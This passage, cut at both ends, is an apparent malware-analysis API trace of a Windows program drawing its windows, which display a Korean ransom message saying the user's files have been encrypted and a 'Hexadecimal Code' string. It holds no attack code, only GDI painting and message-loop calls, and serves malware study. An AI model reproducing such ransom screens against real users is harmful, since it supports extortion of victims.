graphics=0x6e19d10, result=0x11fe7c0) returned 0x0 [0162.638] GdipSaveGraphics (graphics=0x6e19d10, state=0x11fe7ec) returned 0x0 [0162.638] GetWindowTextLengthW (hWnd=0x102dc) returned 32 [0162.638] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x20 [0162.638] GetSystemMetrics (nIndex=42) returned 0 [0162.638] GetWindowTextW (in: hWnd=0x102dc, lpString=0x11fe6c4, nMaxCount=33 | out: lpString="Hexadecimal Code: FB 69FA 9979\r\n") returned 32 [0162.638] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0xd, wParam=0x21, lParam=0x11fe6c4) returned 0x20 [0162.638] GetClientRect (in: hWnd=0x102dc, lpRect=0x11fe7b4 | out: lpRect=0x11fe7b4) returned 1 [0162.638] GdipCreateRegion (region=0x11fe608) returned 0x0 [0162.638] GdipGetClip (graphics=0x6e19d10, region=0x6e1a2e0) returned 0x0 [0162.638] GdipCreateMatrix (matrix=0x11fe608) returned 0x0 [0162.638] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26fa0) returned 0x0 [0162.639] GdipIsMatrixIdentity (matrix=0x6e26fa0, result=0x11fe620) returned 0x0 [0162.639] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551d50) returned 0x0 [0162.639] LocalFree (hMem=0x1551d50) returned 0x0 [0162.639] GdipCombineRegionRegion (region=0x6e1a2e0, region2=0x6e19ff0, combineMode=0x1) returned 0x0 [0162.639] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551a08) returned 0x0 [0162.639] LocalFree (hMem=0x1551a08) returned 0x0 [0162.639] GdipDeleteMatrix (matrix=0x6e26fa0) returned 0x0 [0162.639] GdipIsInfiniteRegion (region=0x6e1a2e0, graphics=0x6e19d10, result=0x11fe648) returned 0x0 [0162.639] GdipIsInfiniteRegion (region=0x6e1a2e0, graphics=0x6e19d10, result=0x11fe638) returned 0x0 [0162.639] GdipGetRegionHRgn (region=0x6e1a2e0, graphics=0x6e19d10, hRgn=0x11fe638) returned 0x0 [0162.639] GdipDeleteRegion (region=0x6e1a2e0) returned 0x0 [0162.639] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe650) returned 0x0 [0162.639] GetCurrentObject (hdc=0x17010812, type=0x1) returned 0xb00017 [0162.639] GetCurrentObject (hdc=0x17010812, type=0x2) returned 0x900010 [0162.639] GetCurrentObject (hdc=0x17010812, type=0x7) returned 0xa050815 [0162.639] GetCurrentObject (hdc=0x17010812, type=0x6) returned 0x8a01c2 [0162.639] SaveDC (hdc=0x17010812) returned 1 [0162.640] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x15040822 [0162.640] GetClipRgn (hdc=0x17010812, hrgn=0x15040822) returned 0 [0162.640] SelectClipRgn (hdc=0x17010812, hrgn=0x14040825) returned 2 [0162.640] DeleteObject (ho=0x15040822) returned 1 [0162.640] DeleteObject (ho=0x14040825) returned 1 [0162.640] OffsetViewportOrgEx (in: hdc=0x17010812, x=0, y=0, lppt=0x333b1d8 | out: lppt=0x333b1d8) returned 1 [0162.640] GetNearestColor (hdc=0x17010812, color=0xaab220) returned 0xaab220 [0162.640] CreateSolidBrush (color=0xaab220) returned 0xe100826 [0162.640] FillRect (hDC=0x17010812, lprc=0x11fe654, hbr=0xe100826) returned 1 [0162.641] DeleteObject (ho=0xe100826) returned 1 [0162.641] RestoreDC (hdc=0x17010812, nSavedDC=-1) returned 1 [0162.641] GdipReleaseDC (graphics=0x6e19d10, hdc=0x17010812) returned 0x0 [0162.641] GdipRestoreGraphics (graphics=0x6e19d10, state=0xfdad0dbd) returned 0x0 [0162.641] GdipDeleteRegion (region=0x6e19ff0) returned 0x0 [0162.641] GetWindowTextLengthW (hWnd=0x102dc) returned 32 [0162.641] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x20 [0162.641] GetSystemMetrics (nIndex=42) returned 0 [0162.641] GetWindowTextW (in: hWnd=0x102dc, lpString=0x11fe6c4, nMaxCount=33 | out: lpString="Hexadecimal Code: FB 69FA 9979\r\n") returned 32 [0162.641] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0xd, wParam=0x21, lParam=0x11fe6c4) returned 0x20 [0162.641] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe670) returned 0x0 [0162.641] GetCurrentObject (hdc=0x17010812, type=0x1) returned 0xb00017 [0162.641] GetCurrentObject (hdc=0x17010812, type=0x2) returned 0x900010 [0162.641] GetCurrentObject (hdc=0x17010812, type=0x7) returned 0xa050815 [0162.642] GetCurrentObject (hdc=0x17010812, type=0x6) returned 0x8a01c2 [0162.642] SaveDC (hdc=0x17010812) returned 1 [0162.642] GetNearestColor (hdc=0x17010812, color=0xffffff) returned 0xffffff [0162.642] RestoreDC (hdc=0x17010812, nSavedDC=-1) returned 1 [0162.642] GdipReleaseDC (graphics=0x6e19d10, hdc=0x17010812) returned 0x0 [0162.645] AdjustWindowRectEx (in: lpRect=0x11fe590, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe590) returned 1 [0162.645] SystemParametersInfoW (in: uiAction=0x100a, uiParam=0x0, pvParam=0x11fe614, fWinIni=0x0 | out: pvParam=0x11fe614) returned 1 [0162.645] SendMessageW (hWnd=0x202c8, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0162.645] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0162.645] GdipGetTextRenderingHint (graphics=0x6e19d10, mode=0x11fe610) returned 0x0 [0162.645] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe5fc) returned 0x0 [0162.645] GetCurrentObject (hdc=0x17010812, type=0x1) returned 0xb00017 [0162.645] GetCurrentObject (hdc=0x17010812, type=0x2) returned 0x900010 [0162.645] GetCurrentObject (hdc=0x17010812, type=0x7) returned 0xa050815 [0162.645] GetCurrentObject (hdc=0x17010812, type=0x6) returned 0x8a01c2 [0162.646] SaveDC (hdc=0x17010812) returned 1 [0162.646] GetTextAlign (hdc=0x17010812) returned 0x0 [0162.646] GetTextColor (hdc=0x17010812) returned 0x0 [0162.646] SetTextColor (hdc=0x17010812, color=0xffffff) returned 0x0 [0162.646] GetCurrentObject (hdc=0x17010812, type=0x6) returned 0x8a01c2 [0162.813] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe344 | out: pv=0x11fe344) returned 92 [0162.813] SelectObject (hdc=0x17010812, h=0xa0a07ef) returned 0x8a01c2 [0162.813] GetBkMode (hdc=0x17010812) returned 2 [0162.813] SetBkMode (hdc=0x17010812, mode=1) returned 2 [0162.813] DrawTextExW (in: hdc=0x17010812, lpchText="Hexadecimal Code: FB 69FA 9979\r\n", cchText=32, lprc=0x11fe590, format=0x100000, lpdtp=0x333b738 | out: lpchText="Hexadecimal Code: FB 69FA 9979\r\n", lprc=0x11fe590) returned 48 [0162.819] RestoreDC (hdc=0x17010812, nSavedDC=-1) returned 1 [0162.819] GdipReleaseDC (graphics=0x6e19d10, hdc=0x17010812) returned 0x0 [0162.819] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe7ac) returned 0x0 [0162.819] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=301, cy=24, hdcSrc=0x17010812, x1=0, y1=0, rop=0xcc0020) returned 1 [0162.819] GdipReleaseDC (graphics=0x6e19d10, hdc=0x17010812) returned 0x0 [0162.819] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0162.819] SelectObject (hdc=0x17010812, h=0x85000f) returned 0xa050815 [0162.819] DeleteDC (hdc=0x17010812) returned 1 [0162.819] GdipDeleteGraphics (graphics=0x6e19d10) returned 0x0 [0162.820] EndPaint (hWnd=0x102dc, lpPaint=0x11fe750) returned 1 [0162.820] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0162.820] IsWindowUnicode (hWnd=0x102de) returned 1 [0162.820] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0162.820] TranslateMessage (lpMsg=0x11fed00) returned 0 [0162.820] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0162.820] BeginPaint (in: hWnd=0x102de, lpPaint=0x11fe790 | out: lpPaint=0x11fe790) returned 0xf0105ee [0162.820] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0162.820] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0162.821] CreateCompatibleDC (hdc=0xf0105ee) returned 0x1a010812 [0162.821] GetObjectType (h=0xf0105ee) returned 0x3 [0162.821] CreateCompatibleBitmap (hdc=0xf0105ee, cx=1, cy=1) returned 0x2c050816 [0162.821] GetDIBits (in: hdc=0xf0105ee, hbm=0x2c050816, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0162.821] GetDIBits (in: hdc=0xf0105ee, hbm=0x2c050816, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0162.821] DeleteObject (ho=0x2c050816) returned 1 [0162.821] CreateDIBSection (in: hdc=0xf0105ee, lpbmi=0x11fe290, usage=0x0, ppvBits=0x11fe784, hSection=0x0, offset=0x0 | out: ppvBits=0x11fe784) returned 0x48050800 [0162.821] SelectObject (hdc=0x1a010812, h=0x48050800) returned 0x85000f [0162.822] GdipCreateFromHDC (hdc=0x1a010812, graphics=0x11fe768) returned 0x0 [0162.822] GdipTranslateWorldTransform (graphics=0x6e19d10, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0162.822] GdipSetClipRectI (graphics=0x6e19d10, x=0, y=0, width=535, height=191, combineMode=0x0) returned 0x0 [0162.822] GdipCreateMatrix (matrix=0x11fe7f0) returned 0x0 [0162.822] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26f70) returned 0x0 [0162.822] GdipIsMatrixIdentity (matrix=0x6e26f70, result=0x11fe808) returned 0x0 [0162.822] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551b20 [0162.822] GdipGetMatrixElements (matrix=0x6e26f70, matrixOut=0x1551b20) returned 0x0 [0162.822] LocalFree (hMem=0x1551b20) returned 0x0 [0162.822] GdipDeleteMatrix (matrix=0x6e26f70) returned 0x0 [0162.822] GdipCreateRegion (region=0x11fe7f0) returned 0x0 [0162.823] GdipGetClip (graphics=0x6e19d10, region=0x6e19ff0) returned 0x0 [0162.823] GdipIsInfiniteRegion (region=0x6e19ff0, graphics=0x6e19d10, result=0x11fe7fc) returned 0x0 [0162.823] GdipSaveGraphics (graphics=0x6e19d10, state=0x11fe828) returned 0x0 [0162.823] GetWindowTextLengthW (hWnd=0x102de) returned 0 [0162.823] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0162.823] GetSystemMetrics (nIndex=42) returned 0 [0162.823] GetWindowTextW (in: hWnd=0x102de, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0162.823] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0162.823] GetClientRect (in: hWnd=0x102de, lpRect=0x11fe7f0 | out: lpRect=0x11fe7f0) returned 1 [0162.824] GdipCreateRegion (region=0x11fe644) returned 0x0 [0162.824] GdipGetClip (graphics=0x6e19d10, region=0x6e1a2e0) returned 0x0 [0162.824] GdipCreateMatrix (matrix=0x11fe644) returned 0x0 [0162.824] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26fa0) returned 0x0 [0162.824] GdipIsMatrixIdentity (matrix=0x6e26fa0, result=0x11fe65c) returned 0x0 [0162.824] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551ae8 [0162.824] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551ae8) returned 0x0 [0162.824] LocalFree (hMem=0x1551ae8) returned 0x0 [0162.824] GdipCombineRegionRegion (region=0x6e1a2e0, region2=0x6e19ff0, combineMode=0x1) returned 0x0 [0162.824] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551ce0 [0162.824] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551ce0) returned 0x0 [0162.824] LocalFree (hMem=0x1551ce0) returned 0x0 [0162.824] GdipDeleteMatrix (matrix=0x6e26fa0) returned 0x0 [0162.824] GdipIsInfiniteRegion (region=0x6e1a2e0, graphics=0x6e19d10, result=0x11fe684) returned 0x0 [0162.824] GdipIsInfiniteRegion (region=0x6e1a2e0, graphics=0x6e19d10, result=0x11fe674) returned 0x0 [0162.824] GdipGetRegionHRgn (region=0x6e1a2e0, graphics=0x6e19d10, hRgn=0x11fe674) returned 0x0 [0162.824] GdipDeleteRegion (region=0x6e1a2e0) returned 0x0 [0162.824] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe68c) returned 0x0 [0162.824] GetCurrentObject (hdc=0x1a010812, type=0x1) returned 0xb00017 [0162.825] GetCurrentObject (hdc=0x1a010812, type=0x2) returned 0x900010 [0162.825] GetCurrentObject (hdc=0x1a010812, type=0x7) returned 0x48050800 [0162.825] GetCurrentObject (hdc=0x1a010812, type=0x6) returned 0x8a01c2 [0162.825] SaveDC (hdc=0x1a010812) returned 1 [0162.825] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x15040825 [0162.825] GetClipRgn (hdc=0x1a010812, hrgn=0x15040825) returned 0 [0162.825] SelectClipRgn (hdc=0x1a010812, hrgn=0x17040822) returned 2 [0162.825] DeleteObject (ho=0x15040825) returned 1 [0162.825] DeleteObject (ho=0x17040822) returned 1 [0162.825] OffsetViewportOrgEx (in: hdc=0x1a010812, x=0, y=0, lppt=0x333cb6c | out: lppt=0x333cb6c) returned 1 [0162.825] GetNearestColor (hdc=0x1a010812, color=0x0) returned 0x0 [0162.825] CreateSolidBrush (color=0x0) returned 0xf100826 [0162.825] FillRect (hDC=0x1a010812, lprc=0x11fe690, hbr=0xf100826) returned 1 [0162.833] DeleteObject (ho=0xf100826) returned 1 [0162.833] RestoreDC (hdc=0x1a010812, nSavedDC=-1) returned 1 [0162.833] GdipReleaseDC (graphics=0x6e19d10, hdc=0x1a010812) returned 0x0 [0162.833] GdipRestoreGraphics (graphics=0x6e19d10, state=0xfdab0dbd) returned 0x0 [0162.833] GdipDeleteRegion (region=0x6e19ff0) returned 0x0 [0162.833] GetWindowTextLengthW (hWnd=0x102de) returned 0 [0162.833] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0162.834] GetSystemMetrics (nIndex=42) returned 0 [0162.834] GetWindowTextW (in: hWnd=0x102de, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0162.834] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0162.834] GdipGetImageWidth (image=0x6e18c80, width=0x11fe6c4) returned 0x0 [0162.834] GdipGetImageHeight (image=0x6e18c80, height=0x11fe6c4) returned 0x0 [0162.834] GdipDrawImageRectI (graphics=0x6e19d10, image=0x6e18c80, x=0, y=0, width=622, height=174) returned 0x0 [0162.850] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe7e8) returned 0x0 [0162.850] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=535, cy=191, hdcSrc=0x1a010812, x1=0, y1=0, rop=0xcc0020) returned 1 [0162.850] GdipReleaseDC (graphics=0x6e19d10, hdc=0x1a010812) returned 0x0 [0162.850] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0162.850] SelectObject (hdc=0x1a010812, h=0x85000f) returned 0x48050800 [0162.851] DeleteDC (hdc=0x1a010812) returned 1 [0162.851] GdipDeleteGraphics (graphics=0x6e19d10) returned 0x0 [0162.851] DeleteObject (ho=0x48050800) returned 1 [0163.006] EndPaint (hWnd=0x102de, lpPaint=0x11fe78c) returned 1 [0163.026] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0163.026] IsWindowUnicode (hWnd=0x102e0) returned 1 [0163.026] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0163.026] TranslateMessage (lpMsg=0x11fed00) returned 0 [0163.026] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0163.026] BeginPaint (in: hWnd=0x102e0, lpPaint=0x11fe754 | out: lpPaint=0x11fe754) returned 0xf0105ee [0163.026] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0163.027] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0163.027] CreateCompatibleDC (hdc=0xf0105ee) returned 0x30010816 [0163.027] DeleteObject (ho=0xa050815) returned 1 [0163.027] GetObjectType (h=0xf0105ee) returned 0x3 [0163.027] CreateCompatibleBitmap (hdc=0xf0105ee, cx=1, cy=1) returned 0xa05081d [0163.028] GetDIBits (in: hdc=0xf0105ee, hbm=0xa05081d, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x11fe244, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe244) returned 1 [0163.028] GetDIBits (in: hdc=0xf0105ee, hbm=0xa05081d, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x11fe244, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe244) returned 1 [0163.028] DeleteObject (ho=0xa05081d) returned 1 [0163.028] CreateDIBSection (in: hdc=0xf0105ee, lpbmi=0x11fe294, usage=0x0, ppvBits=0x11fe788, hSection=0x0, offset=0x0 | out: ppvBits=0x11fe788) returned 0xb050815 [0163.028] SelectObject (hdc=0x30010816, h=0xb050815) returned 0x85000f [0163.028] GdipCreateFromHDC (hdc=0x30010816, graphics=0x11fe76c) returned 0x0 [0163.029] GdipTranslateWorldTransform (graphics=0x6e1f390, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0163.029] GdipSetClipRectI (graphics=0x6e1f390, x=0, y=0, width=369, height=29, combineMode=0x0) returned 0x0 [0163.029] GdipCreateMatrix (matrix=0x11fe7b4) returned 0x0 [0163.029] GdipGetWorldTransform (graphics=0x6e1f390, matrix=0x6e19d80) returned 0x0 [0163.029] GdipIsMatrixIdentity (matrix=0x6e19d80, result=0x11fe7cc) returned 0x0 [0163.029] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551a08 [0163.029] GdipGetMatrixElements (matrix=0x6e19d80, matrixOut=0x1551a08) returned 0x0 [0163.029] LocalFree (hMem=0x1551a08) returned 0x0 [0163.029] GdipDeleteMatrix (matrix=0x6e19d80) returned 0x0 [0163.029] GdipCreateRegion (region=0x11fe7b4) returned 0x0 [0163.029] GdipGetClip (graphics=0x6e1f390, region=0x6e19db0) returned 0x0 [0163.029] GdipIsInfiniteRegion (region=0x6e19db0, graphics=0x6e1f390, result=0x11fe7c0) returned 0x0 [0163.029] GdipSaveGraphics (graphics=0x6e1f390, state=0x11fe7ec) returned 0x0 [0163.029] GetWindowTextLengthW (hWnd=0x102e0) returned 24 [0163.029] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0163.029] GetSystemMetrics (nIndex=42) returned 0 [0163.030] GetWindowTextW (in: hWnd=0x102e0, lpString=0x11fe6d4, nMaxCount=25 | out: lpString="oops! 당신의 파일이 암호화 되었습니다!") returned 24 [0163.030] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0xd, wParam=0x19, lParam=0x11fe6d4) returned 0x18 [0163.030] GetClientRect (in: hWnd=0x102e0, lpRect=0x11fe7b4 | out: lpRect=0x11fe7b4) returned 1 [0163.030] GdipCreateRegion (region=0x11fe608) returned 0x0 [0163.030] GdipGetClip (graphics=0x6e1f390, region=0x6e19e40) returned 0x0 [0163.030] GdipCreateMatrix (matrix=0x11fe608) returned 0x0 [0163.030] GdipGetWorldTransform (graphics=0x6e1f390, matrix=0x6e19ed0) returned 0x0 [0163.030] GdipIsMatrixIdentity (matrix=0x6e19ed0, result=0x11fe620) returned 0x0 [0163.030] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x15516f8 [0163.030] GdipGetMatrixElements (matrix=0x6e19ed0, matrixOut=0x15516f8) returned 0x0 [0163.030] LocalFree (hMem=0x15516f8) returned 0x0 [0163.030] GdipCombineRegionRegion (region=0x6e19e40, region2=0x6e19db0, combineMode=0x1) returned 0x0 [0163.030] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551688 [0163.030] GdipGetMatrixElements (matrix=0x6e19ed0, matrixOut=0x1551688) returned 0x0 [0163.031] LocalFree (hMem=0x1551688) returned 0x0 [0163.031] GdipDeleteMatrix (matrix=0x6e19ed0) returned 0x0 [0163.031] GdipIsInfiniteRegion (region=0x6e19e40, graphics=0x6e1f390, result=0x11fe648) returned 0x0 [0163.031] GdipIsInfiniteRegion (region=0x6e19e40, graphics=0x6e1f390, result=0x11fe638) returned 0x0 [0163.031] GdipGetRegionHRgn (region=0x6e19e40, graphics=0x6e1f390, hRgn=0x11fe638) returned 0x0 [0163.031] GdipDeleteRegion (region=0x6e19e40) returned 0x0 [0163.031] GdipGetDC (graphics=0x6e1f390, hdc=0x11fe650) returned 0x0 [0163.031] GetCurrentObject (hdc=0x30010816, type=0x1) returned 0xb00017 [0163.031] GetCurrentObject (hdc=0x30010816, type=0x2) returned 0x900010 [0163.031] GetCurrentObject (hdc=0x30010816, type=0x7) returned 0xb050815 [0163.031] GetCurrentObject (hdc=0x30010816, type=0x6) returned 0x8a01c2 [0163.031] SaveDC (hdc=0x30010816) returned 1 [0163.031] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x18040822 [0163.032] GetClipRgn (hdc=0x30010816, hrgn=0x18040822) returned 0 [0163.032] SelectClipRgn (hdc=0x30010816, hrgn=0x16040825) returned 2 [0163.032] DeleteObject (ho=0x18040822) returned 1 [0163.032] DeleteObject (ho=0x16040825) returned 1 [0163.032] OffsetViewportOrgEx (in: hdc=0x30010816, x=0, y=0, lppt=0x333e0e4 | out: lppt=0x333e0e4) returned 1 [0163.032] GetNearestColor (hdc=0x30010816, color=0xffffff) returned 0xffffff [0163.032] CreateSolidBrush (color=0xffffff) returned 0x10100826 [0163.032] FillRect (hDC=0x30010816, lprc=0x11fe654, hbr=0x10100826) returned 1 [0163.033] DeleteObject (ho=0x10100826) returned 1 [0163.033] RestoreDC (hdc=0x30010816, nSavedDC=-1) returned 1 [0163.033] GdipReleaseDC (graphics=0x6e1f390, hdc=0x30010816) returned 0x0 [0163.037] GdipRestoreGraphics (graphics=0x6e1f390, state=0xfda90dbd) returned 0x0 [0163.037] GdipDeleteRegion (region=0x6e19db0) returned 0x0 [0163.037] GetWindowTextLengthW (hWnd=0x102e0) returned 24 [0163.037] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0163.037] GetSystemMetrics (nIndex=42) returned 0 [0163.037] GetWindowTextW (in: hWnd=0x102e0, lpString=0x11fe6d4, nMaxCount=25 | out: lpString="oops! 당신의 파일이 암호화 되었습니다!") returned 24 [0163.038] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0xd, wParam=0x19, lParam=0x11fe6d4) returned 0x18 [0163.038] GdipGetDC (graphics=0x6e1f390, hdc=0x11fe670) returned 0x0 [0163.038] GetCurrentObject (hdc=0x30010816, type=0x1) returned 0xb00017 [0163.038] GetCurrentObject (hdc=0x30010816, type=0x2) returned 0x900010 [0163.038] GetCurrentObject (hdc=0x30010816, type=0x7) returned 0xb050815 [0163.038] GetCurrentObject (hdc=0x30010816, type=0x6) returned 0x8a01c2 [0163.038] SaveDC (hdc=0x30010816) returned 1 [0163.038] GetNearestColor (hdc=0x30010816, color=0x0) returned 0x0 [0163.038] RestoreDC (hdc=0x30010816, nSavedDC=-1) returned 1 [0163.038] GdipReleaseDC (graphics=0x6e1f390, hdc=0x30010816) returned 0x0 [0163.039] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0163.039] AdjustWindowRectEx (in: lpRect=0x11fe590, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe590) returned 1 [0163.039] SystemParametersInfoW (in: uiAction=0x100a, uiParam=0x0, pvParam=0x11fe614, fWinIni=0x0 | out: pvParam=0x11fe614) returned 1 [0163.039] SendMessageW (hWnd=0x202c8, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0163.039] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0163.039] GdipGetTextRenderingHint (graphics=0x6e1f390, mode=0x11fe610) returned 0x0 [0163.039] GdipGetDC (graphics=0x6e1f390, hdc=0x11fe5fc) returned 0x0 [0163.039] GetCurrentObject (hdc=0x30010816, type=0x1) returned 0xb00017 [0163.039] GetCurrentObject (hdc=0x30010816, type=0x2) returned 0x900010 [0163.039] GetCurrentObject (hdc=0x30010816, type=0x7) returned 0xb050815 [0163.039] GetCurrentObject (hdc=0x30010816, type=0x6) returned 0x8a01c2 [0163.040] SaveDC (hdc=0x30010816) returned 1 [0163.040] GetTextAlign (hdc=0x30010816) returned 0x0 [0163.040] GetTextColor (hdc=0x30010816) returned 0x0 [0163.040] GetCurrentObject (hdc=0x30010816, type=0x6) returned 0x8a01c2 [0163.040] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe344 | out: pv=0x11fe344) returned 92 [0163.040] SelectObject (hdc=0x30010816, h=0x790a0536) returned 0x8a01c2 [0163.040] GetBkMode (hdc=0x30010816) returned 2 [0163.040] SetBkMode (hdc=0x30010816, mode=1) returned 2 [0163.040] DrawTextExW (in: hdc=0x30010816, lpchText="oops! 당신의 파일이 암호화 되었습니다!", cchText=24, lprc=0x11fe590, format=0x100000, lpdtp=0x333e608 | out: lpchText="oops! 당신의 파일이 암호화 되었습니다!", lprc=0x11fe590) returned 29 [0163.241] RestoreDC (hdc=0x30010816, nSavedDC=-1) returned 1 [0163.241] GdipReleaseDC (graphics=0x6e1f390, hdc=0x30010816) returned 0x0 [0163.241] GdipGetDC (graphics=0x6e1f390, hdc=0x11fe7ac) returned 0x0 [0163.241] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=369, cy=29, hdcSrc=0x30010816, x1=0, y1=0, rop=0xcc0020) returned 1 [0163.242] GdipReleaseDC (graphics=0x6e1f390, hdc=0x30010816) returned 0x0 [0163.242] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0163.242] SelectObject (hdc=0x30010816, h=0x85000f) returned 0xb050815 [0163.242] DeleteDC (hdc=0x30010816) returned 1 [0163.242] GdipDeleteGraphics (graphics=0x6e1f390) returned 0x0 [0163.242] EndPaint (hWnd=0x102e0, lpPaint=0x11fe750) returned 1 [0163.242] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.381] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0165.385] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x46, wParam=0x0, lParam=0x11febd4) returned 0x0 [0165.385] IsWindowUnicode (hWnd=0x102d8) returned 1 [0165.385] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.386] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.386] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.386] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.387] IsWindowUnicode (hWnd=0x102d8) returned 1 [0165.387] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.393] GetKeyState (nVirtKey=17) returned 0 [0165.393] GetKeyState (nVirtKey=18) returned -127 [0165.393] TranslateMessage (lpMsg=0x11fed00) returned 1 [0165.393] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.395] GetKeyState (nVirtKey=16) returned 0 [0165.395] GetKeyState (nVirtKey=17) returned 0 [0165.395] GetKeyState 